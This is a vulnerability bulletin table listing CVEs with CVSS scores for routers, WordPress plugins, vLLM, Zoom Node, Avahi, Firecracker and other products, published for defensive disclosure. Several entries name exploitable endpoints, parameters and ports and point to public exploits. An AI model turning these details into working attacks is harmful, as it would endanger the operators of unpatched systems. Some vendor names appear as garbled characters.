| Totolink--LR350 | A vulnerability was found in Totolink LR350 9.3.5u.6369_B20220309. Affected by this vulnerability is the function setWiFiEasyGuestCfg of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument ssid results in buffer overflow. The attack may be performed from remote. The exploit has been made public and could be used. | 2026-01-19 | 8.8 | CVE-2026-1155 | VDB-341749 | Totolink LR350 cstecgi.cgi setWiFiEasyGuestCfg buffer overflow VDB-341749 | CTI Indicators (IOB, IOC, IOA) Submit #735718 | TOTOLINK LR350 LR350 V9.3.5u.6369_B20220309 Buffer Overflow https://lavender-bicycle-a5a.notion.site/TOTOLINK-LR350-setWiFiEasyGuestCfg-2e453a41781f8034bae3d1a11066a8fb?source=copy_link https://www.totolink.net/ |
| Totolink--LR350 | A vulnerability was determined in Totolink LR350 9.3.5u.6369_B20220309. Affected by this issue is the function setWiFiBasicCfg of the file /cgi-bin/cstecgi.cgi. This manipulation of the argument ssid causes buffer overflow. It is possible to initiate the attack remotely. The exploit has been publicly disclosed and may be utilized. | 2026-01-19 | 8.8 | CVE-2026-1156 | VDB-341750 | Totolink LR350 cstecgi.cgi setWiFiBasicCfg buffer overflow VDB-341750 | CTI Indicators (IOB, IOC, IOA) Submit #735722 | TOTOLINK LR350 LR350 V9.3.5u.6369_B20220309 Buffer Overflow https://lavender-bicycle-a5a.notion.site/TOTOLINK-LR350-setWiFiBasicCfg-2e453a41781f80a2ad43e85bf5d46659?source=copy_link https://www.totolink.net/ |
| Totolink--LR350 | A vulnerability was identified in Totolink LR350 9.3.5u.6369_B20220309. This affects the function setWiFiEasyCfg of the file /cgi-bin/cstecgi.cgi. Such manipulation of the argument ssid leads to buffer overflow. It is possible to launch the attack remotely. The exploit is publicly available and might be used. | 2026-01-19 | 8.8 | CVE-2026-1157 | VDB-341751 | Totolink LR350 cstecgi.cgi setWiFiEasyCfg buffer overflow VDB-341751 | CTI Indicators (IOB, IOC, IOA) Submit #735726 | TOTOLINK LR350 LR350 V9.3.5u.6369_B20220309 Buffer Overflow https://lavender-bicycle-a5a.notion.site/TOTOLINK-LR350-setWiFiEasyCfg-2e453a41781f80b7b53cef33c6a782aa?source=copy_link https://www.totolink.net/ |
| Totolink--LR350 | A security flaw has been discovered in Totolink LR350 9.3.5u.6369_B20220309. This vulnerability affects the function setWizardCfg of the file /cgi-bin/cstecgi.cgi of the component POST Request Handler. Performing a manipulation of the argument ssid results in buffer overflow. The attack can be initiated remotely. The exploit has been released to the public and may be used for attacks. | 2026-01-19 | 8.8 | CVE-2026-1158 | VDB-341752 | Totolink LR350 POST Request cstecgi.cgi setWizardCfg buffer overflow VDB-341752 | CTI Indicators (IOB, IOC, IOA) Submit #735728 | TOTOLINK LR350 LR350 V9.3.5u.6369_B20220309 Buffer Overflow https://lavender-bicycle-a5a.notion.site/TOTOLINK-LR350-setWizardCfg-2e453a41781f80ce89cfc1d25049e279?source=copy_link https://www.totolink.net/ |
| Totolink--NR1800X | A vulnerability was detected in Totolink NR1800X 9.1.0u.6279_B20210910. Impacted is the function setWizardCfg of the file /cgi-bin/cstecgi.cgi of the component POST Request Handler. Performing a manipulation of the argument ssid results in buffer overflow. The attack may be initiated remotely. The exploit is now public and may be used. | 2026-01-22 | 8.8 | CVE-2026-1328 | VDB-342304 | Totolink NR1800X POST Request cstecgi.cgi setWizardCfg buffer overflow VDB-342304 | CTI Indicators (IOB, IOC, IOA) Submit #735792 | TOTOLINK NR1800X NR1800X_Firmware V9.1.0u.6279_B20210910 Buffer Overflow https://lavender-bicycle-a5a.notion.site/TOTOLINK-NR1800X-setWizardCfg-2e453a41781f80568a54c9368082fbe9?source=copy_link https://www.totolink.net/ |
| Unified Intents AB--Unified Remote | Unified Remote 3.9.0.2463 contains a remote code execution vulnerability that allows attackers to send crafted network packets to execute arbitrary commands. Attackers can exploit the service by connecting to port 9512 and sending specially crafted packets to open a command prompt and download and execute malicious payloads. | 2026-01-23 | 9.8 | CVE-2021-47891 | ExploitDB-49587 Unified Remote Official Homepage Unified Remote Download Page VulnCheck Advisory: Unified Remote 3.9.0.2463 - Remote Code Execution |
| UTT-- 520W | A vulnerability was detected in UTT è¿›å– 520W 1.7.7-180627. Affected by this issue is the function strcpy of the file /goform/formWebAuthGlobalConfig. Performing a manipulation results in buffer overflow. The attack is possible to be carried out remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-19 | 8.8 | CVE-2026-1137 | VDB-341728 | UTT è¿›å– 520W formWebAuthGlobalConfig strcpy buffer overflow VDB-341728 | CTI Indicators (IOB, IOC, IOA) Submit #735296 | UTT è¿›å– 520W v3v1.7.7-180627 Buffer Overflow https://github.com/cymiao1978/cve/blob/main/new/32.md |
| UTT-- 520W | A flaw has been found in UTT è¿›å– 520W 1.7.7-180627. This affects the function strcpy of the file /goform/ConfigExceptQQ. Executing a manipulation can lead to buffer overflow. The attack may be performed from remote. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-19 | 8.8 | CVE-2026-1138 | VDB-341729 | UTT è¿›å– 520W ConfigExceptQQ strcpy buffer overflow VDB-341729 | CTI Indicators (IOB, IOC, IOA) Submit #735298 | UTT è¿›å– 520W v3v1.7.7-180627 Buffer Overflow https://github.com/cymiao1978/cve/blob/main/new/33.md |
| UTT-- 520W | A vulnerability has been found in UTT è¿›å– 520W 1.7.7-180627. This vulnerability affects the function strcpy of the file /goform/ConfigExceptMSN. The manipulation leads to buffer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-19 | 8.8 | CVE-2026-1139 | VDB-341730 | UTT è¿›å– 520W ConfigExceptMSN strcpy buffer overflow VDB-341730 | CTI Indicators (IOB, IOC, IOA) Submit #735299 | UTT è¿›å– 520W v3v1.7.7-180627 Buffer Overflow https://github.com/cymiao1978/cve/blob/main/new/34.md |
| UTT-- 520W | A vulnerability was found in UTT è¿›å– 520W 1.7.7-180627. This issue affects the function strcpy of the file /goform/ConfigExceptAli. The manipulation results in buffer overflow. It is possible to launch the attack remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-19 | 8.8 | CVE-2026-1140 | VDB-341731 | UTT è¿›å– 520W ConfigExceptAli strcpy buffer overflow VDB-341731 | CTI Indicators (IOB, IOC, IOA) Submit #735300 | UTT è¿›å– 520W v3v1.7.7-180627 Buffer Overflow https://github.com/cymiao1978/cve/blob/main/new/35.md |
| UTT--HiPER 810 | A flaw has been found in UTT HiPER 810 1.7.4-141218. The impacted element is the function strcpy of the file /goform/setSysAdm. This manipulation of the argument passwd1 causes buffer overflow. Remote exploitation of the attack is possible. The exploit has been published and may be used. | 2026-01-19 | 9.8 | CVE-2026-1162 | VDB-341756 | UTT HiPER 810 setSysAdm strcpy buffer overflow VDB-341756 | CTI Indicators (IOB, IOC, IOA) Submit #736511 | UTT HiPER 810 / nv810v4 nv810v4v1.7.4-141218 Buffer Overflow https://github.com/cha0yang1/UTT810/blob/main/1.md https://github.com/cha0yang1/UTT810/blob/main/1.md#poc |
| VestaCP--VestaCP | VestaCP versions prior to 0.9.8-25 contain a cross-site scripting vulnerability in the IP interface configuration that allows attackers to inject malicious scripts. Attackers can exploit the 'v_interface' parameter by sending a crafted POST request to the add/ip/ endpoint with a stored XSS payload. | 2026-01-21 | 7.2 | CVE-2021-47873 | ExploitDB-49662 VestaCP Official Vendor Homepage VestaCP Alternative Download Site VulnCheck Advisory: VestaCP < 0.9.8-25 - Stored Cross-Site Scripting |
| Vfsforgit--VFS for Git | VFS for Git 1.0.21014.1 contains an unquoted service path vulnerability in the GVFS.Service Windows service that allows local attackers to execute code with elevated privileges. Attackers can exploit the unquoted binary path to inject malicious executables that will be launched with LocalSystem privileges during service startup or system reboot. | 2026-01-21 | 7.8 | CVE-2021-47874 | ExploitDB-49661 Vendor Homepage VulnCheck Advisory: VFS for Git 1.0.21014.1 - 'GVFS.Service' Unquoted Service Path |
| vllm-project--vllm | vLLM is an inference and serving engine for large language models (LLMs). Starting in version 0.10.1 and prior to version 0.14.0, vLLM loads Hugging Face `auto_map` dynamic modules during model resolution without gating on `trust_remote_code`, allowing attacker-controlled Python code in a model repo/path to execute at server startup. An attacker who can influence the model repo/path (local directory or remote Hugging Face repo) can achieve arbitrary code execution on the vLLM host during model load. This happens before any request handling and does not require API access. Version 0.14.0 fixes the issue. | 2026-01-21 | 8.8 | CVE-2026-22807 | https://github.com/vllm-project/vllm/security/advisories/GHSA-2pc9-4j83-qjmr https://github.com/vllm-project/vllm/pull/32194 https://github.com/vllm-project/vllm/commit/78d13ea9de4b1ce5e4d8a5af9738fea71fb024e5 https://github.com/vllm-project/vllm/releases/tag/v0.14.0 |
| wpdevteam--NotificationX FOMO, Live Sales Notification, WooCommerce Sales Popup, GDPR, Social Proof, Announcement Banner & Floating Notification Bar | The NotificationX - FOMO, Live Sales Notification, WooCommerce Sales Popup, GDPR, Social Proof, Announcement Banner & Floating Notification Bar plugin for WordPress is vulnerable to DOM-Based Cross-Site Scripting via the 'nx-preview' POST parameter in all versions up to, and including, 3.2.0. This is due to insufficient input sanitization and output escaping when processing preview data. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute when a user visits a malicious page that auto-submits a form to the vulnerable site. | 2026-01-20 | 7.2 | CVE-2025-15380 | https://www.wordfence.com/threat-intel/vulnerabilities/id/9ca12315-380b-4251-b637-4e9d29df35e0?source=cve https://research.cleantalk.org/cve-2025-15380/ https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3433555%40notificationx&old=3426659%40notificationx&sfp_email=&sfph_mail= |
| wpmessiah--Frontis Blocks Block Library for the Block Editor | The Frontis Blocks plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 1.1.6. This is due to insufficient restriction on the 'url' parameter in the 'template_proxy' function. This makes it possible for unauthenticated attackers to make web requests to arbitrary locations originating from the web application via the '/template-proxy/' and '/proxy-image/' endpoint. | 2026-01-24 | 7.2 | CVE-2026-0807 | https://www.wordfence.com/threat-intel/vulnerabilities/id/322e0a27-9119-4b46-a043-d3a68c4fcdc4?source=cve https://plugins.trac.wordpress.org/browser/frontis-blocks/trunk/includes/Admin/Admin.php#L910 https://plugins.trac.wordpress.org/browser/frontis-blocks/tags/1.1.4/includes/Admin/Admin.php#L910 https://plugins.trac.wordpress.org/changeset/3444616/ |
| wpmudev--Hustle Email Marketing, Lead Generation, Optins, Popups | The Hustle - Email Marketing, Lead Generation, Optins, Popups plugin for WordPress is vulnerable to arbitrary file uploads due to incorrect file type validation in the action_import_module() function in all versions up to, and including, 7.8.9.2. This makes it possible for authenticated attackers, with a lower-privileged role (e.g., Subscriber-level access and above), to upload arbitrary files on the affected site's server which may make remote code execution possible. Successful exploitation requires an admin to grant Hustle module permissions (or module edit access) to the low-privileged user so they can access the Hustle admin page and obtain the required nonce. | 2026-01-24 | 7.5 | CVE-2026-0911 | https://www.wordfence.com/threat-intel/vulnerabilities/id/22be5fb5-143e-4934-9f93-e17def18e883?source=cve https://plugins.trac.wordpress.org/changeset/3440956/wordpress-popup |
| Yodinfo--Mini Mouse | Mini Mouse 9.2.0 contains a remote code execution vulnerability that allows attackers to execute arbitrary commands through an unauthenticated HTTP endpoint. Attackers can leverage the /op=command endpoint to download and execute payloads by sending crafted JSON requests with malicious script commands. | 2026-01-21 | 9.8 | CVE-2021-47851 | ExploitDB-49743 Mini Mouse Apple Store VulnCheck Advisory: Mini Mouse 9.2.0 - Remote Code Execution |
| Yodinfo--Mini Mouse | Mini Mouse 9.2.0 contains a path traversal vulnerability that allows remote attackers to access arbitrary system files and directories through crafted HTTP requests. Attackers can retrieve sensitive files like win.ini and list contents of system directories such as C:\Users\Public by manipulating file and path parameters. | 2026-01-21 | 7.5 | CVE-2021-47850 | ExploitDB-49744 Mini Mouse Apple Store VulnCheck Advisory: Mini Mouse 9.2.0 - Path Traversal |
| Yonyou--KSOA | A vulnerability was detected in Yonyou KSOA 9.0. This vulnerability affects unknown code of the file /worksheet/worksadd.jsp of the component HTTP GET Parameter Handler. The manipulation of the argument ID results in sql injection. The attack may be performed from remote. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-19 | 7.3 | CVE-2026-1129 | VDB-341719 | Yonyou KSOA HTTP GET Parameter worksadd.jsp sql injection VDB-341719 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #734557 | Yonyou KSOA v9.0 SQL Injection https://github.com/LX-66-LX/cve/issues/11 |
| Yonyou--KSOA | A flaw has been found in Yonyou KSOA 9.0. This issue affects some unknown processing of the file /worksheet/worksadd_plan.jsp of the component HTTP GET Parameter Handler. This manipulation of the argument ID causes sql injection. It is possible to initiate the attack remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-19 | 7.3 | CVE-2026-1130 | VDB-341720 | Yonyou KSOA HTTP GET Parameter worksadd_plan.jsp sql injection VDB-341720 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #734565 | Yonyou KSOA v9.0 SQL Injection https://github.com/LX-66-LX/cve/issues/12 |
| Yonyou--KSOA | A vulnerability has been found in Yonyou KSOA 9.0. Impacted is an unknown function of the file /kmc/save_catalog.jsp of the component HTTP GET Parameter Handler. Such manipulation of the argument catalogid leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-19 | 7.3 | CVE-2026-1131 | VDB-341721 | Yonyou KSOA HTTP GET Parameter save_catalog.jsp sql injection VDB-341721 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #734566 | Yonyou KSOA v9.0 SQL Injection https://github.com/LX-66-LX/cve/issues/13 |
| Yonyou--KSOA | A vulnerability was found in Yonyou KSOA 9.0. The affected element is an unknown function of the file /kmf/edit_folder.jsp of the component HTTP GET Parameter Handler. Performing a manipulation of the argument folderid results in sql injection. The attack can be initiated remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-19 | 7.3 | CVE-2026-1132 | VDB-341722 | Yonyou KSOA HTTP GET Parameter edit_folder.jsp sql injection VDB-341722 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #734568 | Yonyou KSOA v9.0 SQL Injection https://github.com/LX-66-LX/cve/issues/15 |
| Yonyou--KSOA | A vulnerability was determined in Yonyou KSOA 9.0. The impacted element is an unknown function of the file /kmf/folder.jsp of the component HTTP GET Parameter Handler. Executing a manipulation of the argument folderid can lead to sql injection. The attack can be launched remotely. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-19 | 7.3 | CVE-2026-1133 | VDB-341723 | Yonyou KSOA HTTP GET Parameter folder.jsp sql injection VDB-341723 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #734576 | Yonyou KSOA v9.0 SQL Injection https://github.com/LX-66-LX/cve/issues/16 |
| Yonyou--KSOA | A weakness has been identified in Yonyou KSOA 9.0. Affected by this vulnerability is an unknown functionality of the file /kmf/save_folder.jsp of the component HTTP GET Parameter Handler. Executing a manipulation of the argument folderid can lead to sql injection. It is possible to launch the attack remotely. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-19 | 7.3 | CVE-2026-1177 | VDB-341771 | Yonyou KSOA HTTP GET Parameter save_folder.jsp sql injection VDB-341771 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #734577 | Yonyou KSOA v9.0 SQL Injection https://github.com/LX-66-LX/cve/issues/17 |
| Yonyou--KSOA | A security vulnerability has been detected in Yonyou KSOA 9.0. Affected by this issue is some unknown functionality of the file /kmf/select.jsp of the component HTTP GET Parameter Handler. The manipulation of the argument folderid leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-19 | 7.3 | CVE-2026-1178 | VDB-341772 | Yonyou KSOA HTTP GET Parameter select.jsp sql injection VDB-341772 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #734593 | Yonyou KSOA v9.0 SQL Injection https://github.com/LX-66-LX/cve/issues/18 |
| Yonyou--KSOA | A vulnerability was detected in Yonyou KSOA 9.0. This affects an unknown part of the file /kmf/user_popedom.jsp of the component HTTP GET Parameter Handler. The manipulation of the argument folderid results in sql injection. The attack can be launched remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-19 | 7.3 | CVE-2026-1179 | VDB-341773 | Yonyou KSOA HTTP GET Parameter user_popedom.jsp sql injection VDB-341773 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #734594 | Yonyou KSOA v9.0 SQL Injection https://github.com/LX-66-LX/cve/issues/19 |
| Zoom Communications Inc.--Zoom Node | A Command Injection vulnerability in Zoom Node Multimedia Routers (MMRs) before version 5.2.1716.0 may allow a meeting participant to conduct remote code execution of the MMR via network access. | 2026-01-20 | 9.9 | CVE-2026-22844 | https://www.zoom.com/en/trust/security-bulletin/zsb-26001 |
Medium Vulnerabilities
| Primary Vendor -- Product |
Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| 10web--Photo Gallery by 10Web Mobile-Friendly Image Gallery | The Photo Gallery by 10Web - Mobile-Friendly Image Gallery plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the delete_comment() function in all versions up to, and including, 1.8.36. This makes it possible for unauthenticated attackers to delete arbitrary image comments. Note: comments functionality is only available in the Pro version of the plugin. | 2026-01-21 | 5.3 | CVE-2026-1036 | https://www.wordfence.com/threat-intel/vulnerabilities/id/4eb2ae42-584d-4da8-9184-461b5a37b7b6?source=cve https://plugins.trac.wordpress.org/browser/photo-gallery/tags/1.8.35/frontend/controllers/BWGControllerGalleryBox.php#L173 |
| adzbierajewski--Alex User Counter | The Alex User Counter plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 6.0. This is due to missing nonce validation on the alex_user_counter_function() function. This makes it possible for unauthenticated attackers to update the plugin settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-01-24 | 4.3 | CVE-2026-1070 | https://www.wordfence.com/threat-intel/vulnerabilities/id/1a5ef5b3-2900-44f0-9e13-66fbdc937b38?source=cve https://plugins.trac.wordpress.org/browser/user-counter/trunk/user-counter.php#L41 https://plugins.trac.wordpress.org/browser/user-counter/tags/6.0/user-counter.php#L41 |
| Aida Computer Information Technology Inc.--Hotel Guest Hotspot | Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Aida Computer Information Technology Inc. Hotel Guest Hotspot allows Reflected XSS. This issue affects Hotel Guest Hotspot: through 22012026. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-22 | 5.5 | CVE-2025-4763 | https://www.usom.gov.tr/bildirim/tr-26-0001 |
| aiktp--AIKTP | The AIKTP plugin for WordPress is vulnerable to unauthorized modification of data due to missing authorization checks on the /aiktp/getToken REST API endpoint in all versions up to, and including, 5.0.04. The endpoint uses the 'verify_user_logged_in' as a permission callback, which only checks if a user is logged in, but fails to verify if the user has administrative capabilities. This makes it possible for authenticated attackers with Subscriber-level access and above to retrieve the administrator's 'aiktpz_token' access token, which can then be used to create posts, upload media library files, and access private content as the administrator. | 2026-01-24 | 5.4 | CVE-2026-1103 | https://www.wordfence.com/threat-intel/vulnerabilities/id/84846d95-792d-4569-b0eb-876d82d0beee?source=cve https://plugins.trac.wordpress.org/browser/aiktp/tags/5.0.04/includes/aiktp-sync.php#L123 https://plugins.trac.wordpress.org/browser/aiktp/tags/5.0.04/includes/aiktp-sync.php#L143 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3445248%40aiktp&new=3445248%40aiktp |
| AlchemyCMS--alchemy_cms | Alchemy is an open source content management system engine written in Ruby on Rails. Prior to versions 7.4.12 and 8.0.3, the application uses the Ruby `eval()` function to dynamically execute a string provided by the `resource_handler.engine_name` attribute in `Alchemy::ResourcesHelper#resource_url_proxy`. The vulnerability exists in `app/helpers/alchemy/resources_helper.rb` at line 28. The code explicitly bypasses security linting with `# rubocop:disable Security/Eval`, indicating that the use of a dangerous function was known but not properly mitigated. Since `engine_name` is sourced from module definitions that can be influenced by administrative configurations, it allows an authenticated attacker to escape the Ruby sandbox and execute arbitrary system commands on the host OS. Versions 7.4.12 and 8.0.3 fix the issue by replacing `eval()` with `send()`. | 2026-01-19 | 6.4 | CVE-2026-23885 | https://github.com/AlchemyCMS/alchemy_cms/security/advisories/GHSA-2762-657x-v979 https://github.com/AlchemyCMS/alchemy_cms/commit/55d03ec600fd9e07faae1138b923790028917d26 https://github.com/AlchemyCMS/alchemy_cms/commit/563c4ce45bf5813b7823bf3403ca1fc32cb769e7 https://github.com/AlchemyCMS/alchemy_cms/releases/tag/v7.4.12 https://github.com/AlchemyCMS/alchemy_cms/releases/tag/v8.0.3 |
| Altium--AES | A stored cross-site scripting (XSS) vulnerability in the BOM Viewer in Altium AES 7.0.3 allows an authenticated attacker to inject arbitrary JavaScript into the Description field of a schematic, which is executed when the BOM Viewer renders the affected content. | 2026-01-22 | 6.8 | CVE-2025-27379 | https://www.altium.com/platform/security-compliance/security-advisories |
| Altium--Altium Designer | Altium Designer version 24.9.0 does not validate self-signed server certificates for cloud connections. An attacker capable of performing a man-in-the-middle (MITM) attack could exploit this issue to intercept or manipulate network traffic, potentially exposing authentication credentials or sensitive design data. | 2026-01-22 | 5.3 | CVE-2025-27377 | https://www.altium.com/platform/security-compliance/security-advisories |
| aminhashemy--GZSEO | The GZSEO plugin for WordPress is vulnerable to authorization bypass leading to Stored Cross-Site Scripting in all versions up to, and including, 2.0.11. This is due to missing capability checks on multiple AJAX handlers combined with insufficient input sanitization and output escaping on the embed_code parameter. This makes it possible for authenticated attackers, with contributor level access and above, to inject arbitrary content into any post on the site that will execute whenever a user accesses an injected page. | 2026-01-24 | 6.4 | CVE-2025-14941 | https://www.wordfence.com/threat-intel/vulnerabilities/id/c91a4d4d-5bfa-42fd-80b4-7a75ee79db19?source=cve https://plugins.trac.wordpress.org/browser/gzseo/tags/2.0.11/includes/class-gzseo-video-update.php?marks=112,365,369,370,563#L112 |
| andddd--WP-ClanWars | The WP-ClanWars plugin for WordPress is vulnerable to SQL Injection via the 'orderby' parameter in all versions up to, and including, 2.0.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2026-01-24 | 4.9 | CVE-2026-0806 | https://www.wordfence.com/threat-intel/vulnerabilities/id/65aa20e2-efc1-481a-8ed4-423d2420c3db?source=cve https://plugins.trac.wordpress.org/browser/wp-clanwars/trunk/classes/teams.class.php#L92 https://plugins.trac.wordpress.org/browser/wp-clanwars/tags/2.0.1/classes/teams.class.php#L92 https://cwe.mitre.org/data/definitions/89.html |
| AutomationDirect--CLICK Programmable Logic Controller | An attacker could decrypt sensitive data, impersonate legitimate users or devices, and potentially gain access to network resources for lateral attacks. | 2026-01-22 | 6.1 | CVE-2025-25051 | https://www.cisa.gov/news-events/ics-advisories/icsa-26-022-02 https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-022-02.json |
| AutomationDirect--CLICK Programmable Logic Controller | An attacker with access to the project file could use the exposed credentials to impersonate users, escalate privileges, or gain unauthorized access to systems and services. The absence of robust encryption or secure handling mechanisms increases the likelihood of this type of exploitation, leaving sensitive information more vulnerable. | 2026-01-22 | 6.1 | CVE-2025-67652 | https://www.cisa.gov/news-events/ics-advisories/icsa-26-022-02 https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-022-02.json |
| avahi--avahi | Avahi is a system which facilitates service discovery on a local network via the mDNS/DNS-SD protocol suite. In versions 0.9rc2 and below, avahi-daemon can be crashed via a segmentation fault by sending an unsolicited mDNS response containing a recursive CNAME record, where the alias and canonical name point to the same domain (e.g., "h.local" as a CNAME for "h.local"). This causes unbounded recursion in the lookup_handle_cname function, leading to stack exhaustion. The vulnerability affects record browsers where AVAHI_LOOKUP_USE_MULTICAST is set explicitly, which includes record browsers created by resolvers used by nss-mdns. This issue is patched in commit 78eab31128479f06e30beb8c1cbf99dd921e2524. | 2026-01-24 | 6.5 | CVE-2026-24401 | https://github.com/avahi/avahi/security/advisories/GHSA-h4vp-5m8j-f6w3 https://github.com/avahi/avahi/issues/501 https://github.com/avahi/avahi/commit/78eab31128479f06e30beb8c1cbf99dd921e2524 |
| AWS--Firecracker | A UNIX symbolic link following issue in the jailer component in Firecracker version v1.13.1 and earlier and 1.14.0 on Linux may allow a local host user with write access to the pre-created jailer directories to overwrite arbitrary host files via a symlink attack during the initialization copy at jailer startup, if the jailer is executed with root privileges. To mitigate this issue, users should upgrade to version v1.13.2 or 1.14.1 or above. | 2026-01-23 | 6 | CVE-2026-1386 | https://aws.amazon.com/security/security-bulletins/2026-003-AWS/ https://github.com/firecracker-microvm/firecracker/releases/tag/v1.14.1 https://github.com/firecracker-microvm/firecracker/releases/tag/v1.13.2 https://github.com/firecracker-microvm/firecracker/security/advisories/GHSA-36j2-f825-qvgc |
| axllent--mailpit | Mailpit is an email testing tool and API for developers. Versions prior to 1.28.3 are vulnerable to Server-Side Request Forgery (SSRF) via HTML Check CSS Download. The HTML Check feature (`/api/v1/message/{ID}/html-check`) is designed to analyze HTML emails for compatibility. During this process, the `inlineRemoteCSS()` function automatically downloads CSS files from external `<link rel="stylesheet" href="...">` tags to inline them for testing. Version 1.28.3 fixes the issue. | 2026-01-19 | 5.8 | CVE-2026-23845 | https://github.com/axllent/mailpit/security/advisories/GHSA-6jxm-fv7w-rw5j https://github.com/axllent/mailpit/commit/1679a0aba592ebc8487a996d37fea8318c984dfe https://github.com/axllent/mailpit/releases/tag/v1.28.3 |
| B&R Industrial Automation GmbH--Automation Runtime | An Allocation of Resources Without Limits or Throttling vulnerability in the ANSL-Server component of B&R Automation Runtime versions prior to 6.5 and prior to R4.93 could be exploited by an unauthenti-cated attacker on the network to win a race condition, resulting in permanent denial-of-service (DoS) conditions on affected devices. | 2026-01-19 | 6.8 | CVE-2025-11044 | https://www.br-automation.com/fileadmin/SA25P005-26597bd0.pdf |
| backstage--backstage | Backstage is an open framework for building developer portals, and @backstage/cli-common provides config loading functionality used by the backend and command line interface of Backstage. Prior to version 0.1.17, the `resolveSafeChildPath` utility function in `@backstage/backend-plugin-api`, which is used to prevent path traversal attacks, failed to properly validate symlink chains and dangling symlinks. An attacker could bypass the path validation via symlink chains (creating `link1 → link2 → /outside` where intermediate symlinks eventually resolve outside the allowed directory) and dangling symlinks (creating symlinks pointing to non-existent paths outside the base directory, which would later be created during file operations). This function is used by Scaffolder actions and other backend components to ensure file operations stay within designated directories. This vulnerability is fixed in `@backstage/backend-plugin-api` version 0.1.17. Users should upgrade to this version or later. Some workarounds are available. Run Backstage in a containerized environment with limited filesystem access and/or restrict template creation to trusted users. | 2026-01-21 | 6.3 | CVE-2026-24047 | https://github.com/backstage/backstage/security/advisories/GHSA-2p49-45hj-7mc9 https://github.com/backstage/backstage/commit/ae4dd5d1572a4f639e1a466fd982656b50f8e692 |
| Beckhoff Automation--TwinCAT.HMI.Server | On an instance of TwinCAT 3 HMI Server running on a device an authenticated administrator can inject arbitrary content into the custom CSS field which is persisted on the device and later returned via the login page and error page. | 2026-01-20 | 5.5 | CVE-2025-41768 | https://certvde.com/de/advisories/VDE-2025-106 |
| birkir--prime | A vulnerability was detected in birkir prime up to 0.4.0.beta.0. This issue affects some unknown processing of the file /graphql of the component GraphQL API. Performing a manipulation results in information disclosure. The attack may be initiated remotely. The exploit is now public and may be used. The project was informed of the problem early through an issue report but has not responded yet. | 2026-01-19 | 5.3 | CVE-2026-1170 | VDB-341764 | birkir prime GraphQL API graphql information disclosure VDB-341764 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #731100 | birkir prime <=0.4.0 Sensitive Information Disclosure https://github.com/birkir/prime/issues/541 |
| birkir--prime | A flaw has been found in birkir prime up to 0.4.0.beta.0. Impacted is an unknown function of the file /graphql of the component GraphQL Field Handler. Executing a manipulation can lead to denial of service. The attack may be launched remotely. The exploit has been published and may be used. The project was informed of the problem early through an issue report but has not responded yet. | 2026-01-19 | 5.3 | CVE-2026-1171 | VDB-341765 | birkir prime GraphQL Field graphql denial of service VDB-341765 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #731101 | birkir prime <=0.4.0 GraphQL Field Duplication Vulnerability https://github.com/birkir/prime/issues/542 |
| birkir--prime | A vulnerability has been found in birkir prime up to 0.4.0.beta.0. The affected element is an unknown function of the file /graphql of the component GraphQL Directive Handler. The manipulation leads to denial of service. Remote exploitation of the attack is possible. The exploit has been disclosed to the public and may be used. The project was informed of the problem early through an issue report but has not responded yet. | 2026-01-19 | 5.3 | CVE-2026-1172 | VDB-341766 | birkir prime GraphQL Directive graphql denial of service VDB-341766 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #731103 | birkir prime <=0.4.0 Graphql Directive Overloading Vulnerability https://github.com/birkir/prime/issues/543 |
